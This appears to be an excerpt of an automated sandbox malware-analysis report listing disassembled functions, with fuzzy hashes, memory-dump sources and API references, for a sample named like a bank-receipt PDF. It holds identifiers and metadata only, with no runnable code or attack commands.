                                                                                                                • Instruction ID: 96fb8681fa350048daca339f11a414c3d50ea97c829d4f1158a9d0a41c8e2d61
                                                                                                                • Opcode Fuzzy Hash: dc185b9434a06ac716bd6f27189c35a665fcda126ffcd138fd53f6a58ce80063
                                                                                                                • Instruction Fuzzy Hash: 7E01F9318193948FC706AB39D9546DE7FB4AF82301F1581A7C0409B1A7D7B4469DCBA2
                                                                                                                Function 060CB22C Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,060CBC69,?,?), ref: 060CBE10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: ed087ca0237bec22367318f23c92ddc860699ed92726b1c20f20091e4de83896
                                                                                                                • Instruction ID: 0035fa4985aa0011a5c72e8d13cf3f821fdafd3f9543e5a0eb7d60ac8a2a9723
                                                                                                                • Opcode Fuzzy Hash: ed087ca0237bec22367318f23c92ddc860699ed92726b1c20f20091e4de83896
                                                                                                                • Instruction Fuzzy Hash: D01116B18003498FCB50DF9AD445BEEBBF4EF48320F148459D559A7241D378A944CFA5
                                                                                                                Function 060CBDB0 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,060CBC69,?,?), ref: 060CBE10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: d29b90f7d48247d07af1d34a681b2251b6912f5b9c21a7f2094256a9cb1e6192
                                                                                                                • Instruction ID: 41a28b0c1933f5d3f316808471edae3ae67619f018a96ca2d26271fc7ce63eba
                                                                                                                • Opcode Fuzzy Hash: d29b90f7d48247d07af1d34a681b2251b6912f5b9c21a7f2094256a9cb1e6192
                                                                                                                • Instruction Fuzzy Hash: DA1143B18002488FCB20CFAAC485BEEBFF4EF48320F24855AD559A7241D378A544CFA1
                                                                                                                Function 082748C0 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: G'/.
                                                                                                                • API String ID: 0-3562003039
                                                                                                                • Opcode ID: 560e7a7e8642d7b0fc6f7299fbd4045fcd1799849fbb4ec7f25ec7aa6a0554aa
                                                                                                                • Instruction ID: 83f5ce9ff18dfd9eac41f2b166784e94ac01c09261d54acdfb2f7ccc49ee28ff
                                                                                                                • Opcode Fuzzy Hash: 560e7a7e8642d7b0fc6f7299fbd4045fcd1799849fbb4ec7f25ec7aa6a0554aa
                                                                                                                • Instruction Fuzzy Hash: 7E01F570E21309DFD708DFAAD94474EFFB2EB85301F20D469C805A3254E7308B51D648
                                                                                                                Function 082748D0 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: G'/.
                                                                                                                • API String ID: 0-3562003039
                                                                                                                • Opcode ID: ce4a9e95a5933c268d2bec2fdb3df488ad23ff10c055d6a304dfda038f1b1002
                                                                                                                • Instruction ID: ab20a95bdf82aed36c4dccf932f09282795a847dcdee4684cff5913acd1ee862
                                                                                                                • Opcode Fuzzy Hash: ce4a9e95a5933c268d2bec2fdb3df488ad23ff10c055d6a304dfda038f1b1002
                                                                                                                • Instruction Fuzzy Hash: 2501D470E26208DFD708EFA6D94459DFEB6EB85301F20D579C419A3254E6709B50C608
                                                                                                                Function 0827CF70 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ]"4
                                                                                                                • API String ID: 0-3376221696
                                                                                                                • Opcode ID: 25cf9c047f8e99c6c91683f0ade13b81b9ab08f5110538e8b3b77b4258254652
                                                                                                                • Instruction ID: 8c8369fbe4d68253e0c5399678d2b594eb7af5cdef075bda8fbc853cb4d73df6
                                                                                                                • Opcode Fuzzy Hash: 25cf9c047f8e99c6c91683f0ade13b81b9ab08f5110538e8b3b77b4258254652
                                                                                                                • Instruction Fuzzy Hash: F1F0A7309241088FD744AB67D90879DBBB9EF85302F00C13AD00463295DFB555C9CB62
                                                                                                                Function 08278D44 Relevance: .1, Instructions: 144COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a23f391d0ee7ccb6b79faa4c9856d91f2f9fe37216c8b3005bed70aa1a310bba
                                                                                                                • Instruction ID: 114a47dd830ea2b13294cb486023830f94bd79c2233a63d0b6cc35afb5f59819
                                                                                                                • Opcode Fuzzy Hash: a23f391d0ee7ccb6b79faa4c9856d91f2f9fe37216c8b3005bed70aa1a310bba
                                                                                                                • Instruction Fuzzy Hash: F741327190E3C59FC3079B7888286997F709F03212F0A45EBD4C4DF1A3D67A494ACBA6
                                                                                                                Function 0827904F Relevance: .1, Instructions: 130COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 195fb7ccd439d230da067a1a6185058cf820aa1bda669e698ed902fbd59d19d4
                                                                                                                • Instruction ID: b07abb7f8e31d3b6b4dfacb97c58df024c3ea710ea85af0f9d09724305ec5d5d
                                                                                                                • Opcode Fuzzy Hash: 195fb7ccd439d230da067a1a6185058cf820aa1bda669e698ed902fbd59d19d4
                                                                                                                • Instruction Fuzzy Hash: BE51F034926205CFDB24CF6AC588A9AFBB6FF49312F55D199D008AB212C734E9C4CB55
                                                                                                                Function 08279FE0 Relevance: .1, Instructions: 126COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: acfcc9513f8ba53f2968e99891692a4e800531bec9a5e02b88f3d84131383045
                                                                                                                • Instruction ID: 39af0bd3c5331144d8678bf8b7eae30c886eddd729639cc8f09e47e1940bb9ba
                                                                                                                • Opcode Fuzzy Hash: acfcc9513f8ba53f2968e99891692a4e800531bec9a5e02b88f3d84131383045
                                                                                                                • Instruction Fuzzy Hash: DD411674D29229CFDB08CFAAC4446EEFBF6AB8C312F14D429D41AA3251D7745941CB64
                                                                                                                Function 08279FD1 Relevance: .1, Instructions: 117COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d27befec54a5eeaa9b260da9c90ad19b243cd6c91b9a59730264789c7375a15
                                                                                                                • Instruction ID: 47301915abeb52f6cc5f6879577ed57d23bc3e2e5364bf2d3ed66c05ad72393f
                                                                                                                • Opcode Fuzzy Hash: 7d27befec54a5eeaa9b260da9c90ad19b243cd6c91b9a59730264789c7375a15
                                                                                                                • Instruction Fuzzy Hash: 0A413774D29218CFDB09CFAAD4446EEFBF6AF8D312F14D06AD40AA3251D7744940CB54
                                                                                                                Function 0827AE58 Relevance: .1, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cba5b30bb98178f9994e8da50b3655f255f231bf68530d577a8ea07e094d56b3
                                                                                                                • Instruction ID: 16a827abee695ac5468bf96e6d24a92dcc0d861d4e4f3077c85ace86753da525
                                                                                                                • Opcode Fuzzy Hash: cba5b30bb98178f9994e8da50b3655f255f231bf68530d577a8ea07e094d56b3
                                                                                                                • Instruction Fuzzy Hash: 74411A34924168CFDB18CF56D984AACB7B9FF49312F10D5EAD80BA7252C771A981CF50
                                                                                                                Function 08275F58 Relevance: .1, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7ba9852b27601c38c96726aa7f38ed17c2e36088d99a9abc07475e322aac788a
                                                                                                                • Instruction ID: 6b1f044af1e1b24cee36b2c5fda33f91e5013f82256f908f8938637ddff78c39
                                                                                                                • Opcode Fuzzy Hash: 7ba9852b27601c38c96726aa7f38ed17c2e36088d99a9abc07475e322aac788a
                                                                                                                • Instruction Fuzzy Hash: 7D3136B6900249AFCB14DFAAD844ADEBFF5FB49310F14846AE909E7310D735A944CFA0
                                                                                                                Function 08277158 Relevance: .1, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3dbdad3578e5129e4da965be8599e60fa2286240be8b5825a45c569e2c6c6ea9
                                                                                                                • Instruction ID: 1e89a60aa0e10563a9387b252e58326ee353465b6593e63bb5102db8c9480bc8
                                                                                                                • Opcode Fuzzy Hash: 3dbdad3578e5129e4da965be8599e60fa2286240be8b5825a45c569e2c6c6ea9
                                                                                                                • Instruction Fuzzy Hash: 4F311970E2520ADFCB48CFAAD5846AEBBF2FF88311F20D5AAD415A7250D7349A41CF54
                                                                                                                Function 08275228 Relevance: .1, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05a18f3475fd916e1aba46c821eadcd9147edd256836ad49c4b25b9f0430a597
                                                                                                                • Instruction ID: 749005553366b5578fb12e6f4b7fb0c2c74a37f100fe4a36b40ff44ba659c1d0
                                                                                                                • Opcode Fuzzy Hash: 05a18f3475fd916e1aba46c821eadcd9147edd256836ad49c4b25b9f0430a597
                                                                                                                • Instruction Fuzzy Hash: FD310274E212199FCB08CFAAD5859EEFBB2FF88311F10842AE816A7354DB745941CF94
                                                                                                                Function 08271E20 Relevance: .1, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce9f38e54bce3c3e6dd381378c91c40b35091bbb3de31d460b41d9512412024c
                                                                                                                • Instruction ID: 1e5202cec6c154de7f3e76584c7a105c1424ebd62739548f7a3c7a61c886ec93
                                                                                                                • Opcode Fuzzy Hash: ce9f38e54bce3c3e6dd381378c91c40b35091bbb3de31d460b41d9512412024c
                                                                                                                • Instruction Fuzzy Hash: F93106B0E2120ADFCB08CFAAC4815AEFBB2FF88301F54D56AD415A7244E7749A51CB94
                                                                                                                Function 08271E30 Relevance: .1, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0d7be224a1aa95d3281f93ce4272dacfcc3c96c8d4776caec206e0f57b06230d
                                                                                                                • Instruction ID: 54256470b9250e775f366856db2026afbea9737aabea15463f64110776bc1232
                                                                                                                • Opcode Fuzzy Hash: 0d7be224a1aa95d3281f93ce4272dacfcc3c96c8d4776caec206e0f57b06230d
                                                                                                                • Instruction Fuzzy Hash: 503127B0E2120ADFCB08CFAAC4805AEFBB2FF88301F14D56AD419A7254D7749A51CF95
                                                                                                                Function 0827D174 Relevance: .1, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b4714b89db4ba65a154088c6269db735d6d427a31bb924404a70946d72160dbe
                                                                                                                • Instruction ID: f49b7f49174f88eb1ca244baeda3ee961fa8e13bced026a801f97d3fb3e798f6
                                                                                                                • Opcode Fuzzy Hash: b4714b89db4ba65a154088c6269db735d6d427a31bb924404a70946d72160dbe
                                                                                                                • Instruction Fuzzy Hash: 7331E374924255CFC704EFA9E6889ADBBF5FF45312B14922CD409EB35AD734A881CF60
                                                                                                                Function 08275218 Relevance: .1, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 616a5fd1fa6c7b41f656d5d98e042f1bc0ede9b89461a94ef7a32c56f6aecfd0
                                                                                                                • Instruction ID: 80a69fc51669fe314d0c73c01c8573eee38726a93149d9e3ebf99e3c26d658cf
                                                                                                                • Opcode Fuzzy Hash: 616a5fd1fa6c7b41f656d5d98e042f1bc0ede9b89461a94ef7a32c56f6aecfd0
                                                                                                                • Instruction Fuzzy Hash: 32312274E252099FCB08CFAAD945AEEFBB2FF88311F10842AE815A7350DB745945CF94
                                                                                                                Function 08277155 Relevance: .1, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 713103cb10119ddd681de32c135daa6aa3003731c9a46818e51558497f7c702a
                                                                                                                • Instruction ID: d4dea0c5155f2c847e45bd3f541d00c861241d27faaca55282e7ea3cf5aec8f3
                                                                                                                • Opcode Fuzzy Hash: 713103cb10119ddd681de32c135daa6aa3003731c9a46818e51558497f7c702a
                                                                                                                • Instruction Fuzzy Hash: 70314770E25209DFCB48CFAAC5846AEBFF2EB88312F24D4AAD415A7250D7349A41CF54
                                                                                                                Function 013CD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2041799744.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_13cd000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 13978e97ed4321b49b9e03dd332149abf38a4d932c028a8ae70f8ba4c7225237
                                                                                                                • Instruction ID: 4110e2362606ceb6db92bcc4f11c8c021a2b905d956e15fe6f9c769f54e0c438
                                                                                                                • Opcode Fuzzy Hash: 13978e97ed4321b49b9e03dd332149abf38a4d932c028a8ae70f8ba4c7225237
                                                                                                                • Instruction Fuzzy Hash: 74210271100204DFDB05DF58D9C0B66BF69FB88718F20C17DEA091A256C73AE806C7E1
                                                                                                                Function 013CD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2041799744.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_13cd000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b072b94728dfe8c13c6e9d065791f68047ac7f074e4894ec1fda0aa12a8e2682
                                                                                                                • Instruction ID: 9af20bad539193d78c4856436c4ac632541eceb05b857d8f22f195c7b9649a4f
                                                                                                                • Opcode Fuzzy Hash: b072b94728dfe8c13c6e9d065791f68047ac7f074e4894ec1fda0aa12a8e2682
                                                                                                                • Instruction Fuzzy Hash: AD21E072500244DFDB05DF58D980B26BF69FB98718F20857DE9090A256C33AD816CBE2
                                                                                                                Function 0827F81A Relevance: .1, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 27a2f55d5c6671472f59f236449a368ffc0defe1cb9b7a210485d9511a3e24ce
                                                                                                                • Instruction ID: 313e77a36256ea689717d68caea1d4850b5698e203b6e7c4c5e22768ef69f8e1
                                                                                                                • Opcode Fuzzy Hash: 27a2f55d5c6671472f59f236449a368ffc0defe1cb9b7a210485d9511a3e24ce
                                                                                                                • Instruction Fuzzy Hash: 4531F574E252099FCB05DFA9D588AEEBBF1FF49311F10812AE811A7360DB709940CFA4
                                                                                                                Function 0827F820 Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3f566fdff3261c824c85ea3688323caf0bd0f82f3b28ef5dec813753fe78e556
                                                                                                                • Instruction ID: f157f78810beb59883515f371ddb751d6555461497033d951eaa6b324f75f4fe
                                                                                                                • Opcode Fuzzy Hash: 3f566fdff3261c824c85ea3688323caf0bd0f82f3b28ef5dec813753fe78e556
                                                                                                                • Instruction Fuzzy Hash: A631C774E142099FCB05DFA9D5989EDBBF1FF49311F10812AE815A7360DB74A940CFA4
                                                                                                                Function 0827D0EF Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c29d6aa8800e562fa8929ce93431096ff60cf05e5daab61db8470939a99e4ca3
                                                                                                                • Instruction ID: 02677df4770d659297921f61cd6afc901e1652fa4acb121eabf65e55b6e48033
                                                                                                                • Opcode Fuzzy Hash: c29d6aa8800e562fa8929ce93431096ff60cf05e5daab61db8470939a99e4ca3
                                                                                                                • Instruction Fuzzy Hash: 4D314838A103288FCB549F24EA58BA9BBB6FB89301F1081E9D40E97359DB315DD1CF61
                                                                                                                Function 013DD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2041871134.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_13dd000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b4e0eacd78df9ae65a921251d6922c659c92187bf98ed209e8dcef7a95116394
                                                                                                                • Instruction ID: ae4427178aa0a15d060b0a68f12b19a806c88b1cb044774888db9f302bfee3fa
                                                                                                                • Opcode Fuzzy Hash: b4e0eacd78df9ae65a921251d6922c659c92187bf98ed209e8dcef7a95116394
                                                                                                                • Instruction Fuzzy Hash: 59212572504204DFCB15DF68E980B16BF69FBC8318F20C56DD90A0B396C33AD407CA61
                                                                                                                Function 013DD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2041871134.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_13dd000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bdb80c824afd3042c150196b4281eb22436b9bea156a4e955834acb954372585
                                                                                                                • Instruction ID: db231c413c444d43013b6f1d15a58509b3292c2f1091f3d556ad93ed7213aae6
                                                                                                                • Opcode Fuzzy Hash: bdb80c824afd3042c150196b4281eb22436b9bea156a4e955834acb954372585
                                                                                                                • Instruction Fuzzy Hash: F9210772544204EFDB05DFA8E9C0F26BF69FB84328F20C56DD9494B396C33AD406CA61
                                                                                                                Function 0827B142 Relevance: .1, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e1cd449de45a7839eb60a3efd68f62aa850ba4b78ff525fccc4f025c02c10313
                                                                                                                • Instruction ID: 9dd4d4bae718a5de6793dc1cc32608be3e73aa6de440ff7e1af6b616a16ba740
                                                                                                                • Opcode Fuzzy Hash: e1cd449de45a7839eb60a3efd68f62aa850ba4b78ff525fccc4f025c02c10313
                                                                                                                • Instruction Fuzzy Hash: 1C217F30D0A3849FCB0ADFAAD8545ADBFB1AF8B311F4481AED445AF262C7748885CB51
                                                                                                                Function 0827A148 Relevance: .1, Instructions: 66COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c822ac9d43eaea3b9e40658c31d63269b2659462490b60f53b98566a8b3ac09d
                                                                                                                • Instruction ID: 3703bd52eff365c507fe34038a40e8e9627848704293e6f2c51af1f25b82f64e
                                                                                                                • Opcode Fuzzy Hash: c822ac9d43eaea3b9e40658c31d63269b2659462490b60f53b98566a8b3ac09d
                                                                                                                • Instruction Fuzzy Hash: 3B21E674D19259CFCB45CFAAC5809AEBBF5EB49311F20919AD40AA7712C3709A40CF91
                                                                                                                Function 0827E8AA Relevance: .1, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1eab6a460843ee991560df64ee8fb3133d4558ccef51b5c172f797ab08ef881e
                                                                                                                • Instruction ID: 5b26f369958b8dea3e15e0d1d8f79b2573ff418db615cb206a86a08e5ef63b26
                                                                                                                • Opcode Fuzzy Hash: 1eab6a460843ee991560df64ee8fb3133d4558ccef51b5c172f797ab08ef881e
